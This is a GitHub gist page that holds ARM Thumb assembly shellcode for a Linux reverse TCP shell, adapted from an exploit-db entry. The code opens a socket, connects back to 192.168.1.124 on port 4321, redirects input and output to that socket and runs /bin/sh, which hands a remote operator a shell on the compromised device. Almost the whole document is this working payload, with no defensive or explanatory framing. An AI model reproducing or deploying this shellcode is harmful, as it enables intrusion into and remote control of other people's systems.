Created
April 2, 2020 14:14
-
-
Save dominusmi/30045c9ce269c4c245d4022ba0e03fca to your computer and use it in GitHub Desktop.
Linux/ARM - Reverse TCP (192.168.1.124:4321) Shell (/bin/sh) Shellcode (64 bytes)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// This is a slightly modified version of an ARM shellcode to open a reverse TCP shell. | |
// The original can be found here: https://www.exploit-db.com/exploits/46258 | |
// and was made by Gokul Babu - https://www.linkedin.com/in/gokul-babu-452b3b112/ | |
.section .text | |
.global _start | |
_start: | |
.ARM | |
add r3,pc,#1 | |
bx r3 | |
.THUMB | |
//socket: | |
mov r0,#2 | |
mov r1,#1 | |
mov r7,#200 | |
add r7,#81 | |
svc #1 | |
push {r0,r1,r2} /*store all values r0=3,r1=1,r2=0*/ | |
//connect: | |
adr r1, sockaddr | |
strb r2,[r1,#1] | |
mov r2,#16 | |
add r7,#2 | |
svc #1 | |
//dup2: | |
//dup2(3,2)/*No need of stderr, program works fine without stderr*/ | |
pop {r0,r1,r2} /* Restoring all values */ | |
mov r7,#63 | |
//dup2(3,1) | |
svc #1 | |
//dup2(3,0) -> but gets changed to dup2(1,0)-see strace debug file for reference | |
sub r1,#1 | |
svc #1 | |
//execve: | |
adr r0,exc | |
strb r1,[r0,#7] | |
mov r7,#11 | |
svc #1 | |
exc: | |
.ascii "/bin/shX" | |
sockaddr: | |
.ascii "\x02\xff" | |
.ascii "\x10\xE1" //port 4321 | |
.byte 192,168,1,124 //IP |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment